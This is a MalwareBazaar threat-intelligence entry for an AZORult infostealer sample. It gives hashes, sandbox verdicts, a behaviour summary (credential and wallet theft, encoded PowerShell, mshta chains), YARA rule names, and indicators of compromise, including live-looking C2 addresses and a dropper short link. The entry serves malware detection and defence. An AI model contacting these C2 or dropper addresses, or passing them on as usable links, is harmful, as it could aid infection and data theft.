MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


AZORult


Vendor detections: 14


Intelligence 14 IOCs 1 YARA 3 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53
SHA3-384 hash: b2901d495599f71f43c9038f68314b9429832596c835055406697263c5730160f5bfc91f8b132fa2f5cab4fb6cddf0d9
SHA1 hash: a0ccae106a243ad2b1d748512c3e6783b2dd2547
MD5 hash: f88740451956d87424b84326e9e9dde7
humanhash: two-oranges-dakota-six
File name:C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe
Download: download sample
Signature AZORult
Create hunting rule
File size:105'984 bytes
First seen:2021-11-24 07:55:32 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 06ac1f21ee2a357ffb0dd7db52cbbb13 (1 x WSHRAT, 1 x AZORult, 1 x Conti)
ssdeep 1536:IuW0xpn7JWWkH7Jx1Q3jh1GTuGi1GfT4i1GtszSGkckZptXUG8IUcGHPGq9OR:G0TIVAncytktIJGHi
Threatray 7'528 similar samples on MalwareBazaar
TLSH T161A35D4F6E201159C4363FF95A7A1065DAB480178F480C57F35C7A299F6EBE9CE202AF
File icon (PE):PE icon
dhash icon 01e6e6e6dcd81823 (2 x AZORult, 1 x RaccoonStealer, 1 x Worm.Ramnit)
Reporter abuse_ch
Tags:AZORult exe


Avatar
abuse_ch
AZORult C2:
http://91.219.236.69/

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOCThreatFox Reference
http://91.219.236.69/ https://threatfox.abuse.ch/ioc/253491/

Intelligence

File Origin
# of uploads :
1
# of downloads :
337
Origin country :
n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe
Verdict:
Malicious activity
Analysis date:
2021-11-24 07:56:49 UTC
Tags:
loader trojan stealer vidar rat azorult
Link:
https://app.any.run/tasks/a38c1292-7fd4-4b7c-b9f5-e3eccc10ff80

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Gathering data
Detection(s):
SecuriteInfo.com.Variant.Kazy.383340.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a file in the %temp% subdirectories
Сreating synchronization primitives
Running batch commands
Creating a process with a hidden window
Launching a process
Creating a window
Creating a process from a recently created file
Creating a file
Searching for the window
DNS request
Sending an HTTP GET request
Searching for synchronization primitives
Connecting to a non-recommended domain
Query of malicious DNS domain
Launching a file downloaded from the Internet
Sending an HTTP GET request to an infection source
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
80%
Tags:
packed packed patcher
Link:
https://www.filescan.io/uploads/619df016f36138de3f39321a/reports/242617b6-4713-4b6e-b65b-2a22bb9433c2/overview
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family:
AZORult
Create hunting rule
Verdict:
Malicious
Link:
https://analyze.intezer.com/analyses/2cdb3b99-965e-4d14-b672-2831a2173e19
Result
Threat name:
Azorult
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/895201
Signature
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Creates HTA files
Detected unpacking (overwrites its own PE header)
Drops PE files to the user root directory
Found malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Encoded FromBase64String
Sigma detected: Execution from Suspicious Folder
Sigma detected: FromBase64String Command Line
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Suspicious PowerShell Command Line
Sigma detected: Suspicious Script Execution From Temp Folder
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Yara detected Azorult
Yara detected Azorult Info Stealer
Yara detected BatToExe compiled binary
Yara detected Generic Patcher
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 527679 Sample: C594188774A2D72B774ACA96EB0... Startdate: 24/11/2021 Architecture: WINDOWS Score: 100 71 colonna.ug 2->71 73 colonna.ac.ug 2->73 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Multi AV Scanner detection for domain / URL 2->101 103 Found malware configuration 2->103 105 21 other signatures 2->105 11 C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe 8 2->11         started        signatures3 process4 file5 59 C:\Users\user\AppData\Local\...\Patch-nb9.exe, PE32 11->59 dropped 61 C:\Users\user\AppData\Local\...\start.bat, DOS 11->61 dropped 63 C:\Users\user\AppData\Local\...\89465456.hta, HTML 11->63 dropped 65 2 other malicious files 11->65 dropped 113 Detected unpacking (overwrites its own PE header) 11->113 115 Creates HTA files 11->115 15 cmd.exe 3 2 11->15         started        signatures6 process7 process8 17 mshta.exe 19 15->17         started        20 mshta.exe 1 15->20         started        22 mshta.exe 1 15->22         started        24 2 other processes 15->24 file9 89 Suspicious powershell command line found 17->89 27 powershell.exe 17->27         started        31 powershell.exe 21 20->31         started        33 powershell.exe 18 22->33         started        57 C:\Users\user\AppData\...\dup2patcher.dll, PE32 24->57 dropped 91 Multi AV Scanner detection for dropped file 24->91 93 Machine Learning detection for dropped file 24->93 signatures10 process11 dnsIp12 75 opesjk.ug 194.87.46.42, 49718, 80 ASBAXETNRU Russian Federation 27->75 67 C:\Users\Public\sjw.exe, PE32 27->67 dropped 36 sjw.exe 27->36         started        40 conhost.exe 27->40         started        77 partaususd.ru 109.196.164.102, 49722, 80 MTW-ASRU Russian Federation 31->77 79 bit.do 54.83.52.76, 49721, 49723, 80 AMAZON-AESUS United States 31->79 69 C:\Users\Public\urn.exe, PE32 31->69 dropped 42 urn.exe 31->42         started        44 conhost.exe 31->44         started        81 marksidfg.ug 33->81 95 Drops PE files to the user root directory 33->95 97 Powershell drops PE file 33->97 46 conhost.exe 33->46         started        file13 signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\fsacvbe.exe, PE32 36->53 dropped 55 C:\Users\user\AppData\Local\...\cbvdsme.exe, PE32 36->55 dropped 107 Antivirus detection for dropped file 36->107 109 Multi AV Scanner detection for dropped file 36->109 111 Machine Learning detection for dropped file 36->111 48 cbvdsme.exe 36->48         started        51 fsacvbe.exe 36->51         started        signatures17 process18 signatures19 83 Antivirus detection for dropped file 48->83 85 Multi AV Scanner detection for dropped file 48->85 87 Machine Learning detection for dropped file 48->87
Detection:
azorult
Create hunting rule
Link:
https://mwdb.cert.pl/sample/c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53/
Threat name:
Win32.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2019-08-15 01:23:42 UTC
File Type:
PE (Exe)
Extracted files:
10
AV detection:
28 of 45 (62.22%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ywkbrb3uullsw52kzklowclmje634xe3lgn66rqb5vae37rpvnjq._file
Verdict:
malicious
Similar samples:
0290fd4f9c7240911d9051f76167a75dd78834e6a03faf6b09aeae21ff3094db
AZORult
37e292496f057cbbba45f28b7510c8e4b555dcb2ad4308e1df9f251c9980830d
AZORult
5edb1348236c7fa03dae6c9e2d3c9e4241c2eaa2a8721e5c4b78abc9b66075f8
AZORult
98a95a5a51b25140ce1d02655bcdac7f820f1feee5606b41d9c94747aae570aa
AZORult
bd3cefcbb135df48caee6888747542a304c4706e24e93492c481201c556bf334
AZORult
d3abda3195fac1ac78486e29fa82d05a3e3bbcba22aa29191dfc21926e027db7
AZORult
e688db3d0be7a10fa8ddd79918265cac9ef0949d7d07072f82aff9ae43d6fadb
AZORult
+ 7'518 additional samples on MalwareBazaar
Result
Malware family:
raccoon
Create hunting rule
Score:
  10/10
Tags:
family:azorult family:oski family:raccoon botnet:7632dffeb03da57edca98c8bfb2611868e8eb0a7 discovery infostealer spyware stealer trojan upx
Link:
https://tria.ge/reports/211124-jspmcsfdb9/
Behaviour
Checks processor information in registry
Kills process with taskkill
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
ACProtect 1.3x - 1.4x DLL software
Azorult
Oski
Raccoon
Malware Config
C2 Extraction:
http://195.245.112.115/index.php
colonna.ac.ug
Dropper Extraction:
http://bit.do/e33Br
Unpacked files
SH256 hash:
39281bf3f40ccecd50166275ff6e1e93759ed5c02ac95793720be0db8436be5c
MD5 hash:
57c9232cb9711251080f39cd34e4f989
SHA1 hash:
a35f74a25a20c595dd8e5316e02f94ba57e99a51
Link:
https://www.unpac.me/results/92c3c560-c985-4012-b193-d5a1490db459/
SH256 hash:
b83c29856aa552c04f07591b1b6e2f2fc95ed0467fe791b735883c100069d744
MD5 hash:
d3b19e5d1fb169dae0414d6b82430e02
SHA1 hash:
e8a11009d1e36669dffc635a3d573163bac48108
Link:
https://www.unpac.me/results/92c3c560-c985-4012-b193-d5a1490db459/
SH256 hash:
c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53
MD5 hash:
f88740451956d87424b84326e9e9dde7
SHA1 hash:
a0ccae106a243ad2b1d748512c3e6783b2dd2547
Detections:
win_batchwiper_auto
Create hunting rule
Link:
https://www.unpac.me/results/92c3c560-c985-4012-b193-d5a1490db459/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:CN_Honker_Acunetix_Web_Vulnerability_Scanner_8_x_Enterprise_Edition_KeyGen
Create hunting rule
Author:Florian Roth
Description:Sample from CN Honker Pentest Toolset - file Acunetix_Web_Vulnerability_Scanner_8.x_Enterprise_Edition_KeyGen.exe
Reference:Disclosed CN Honker Pentest Toolset
Rule name:Generic_KeyGen_Patcher_RID2F96
Create hunting rule
Author:Florian Roth
Description:Keygen from CN Honker Pentest Toolset - file Acunetix_Web_Vulnerability_Scanner_8.x_Enterprise_Edition_KeyGen.exe
Reference:Disclosed CN Honker Pentest Toolset
Rule name:win_batchwiper_auto
Create hunting rule
Author:Felix Bilstein - yara-signator at cocacoding dot com
Description:Detects win.batchwiper.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/208880/

Comments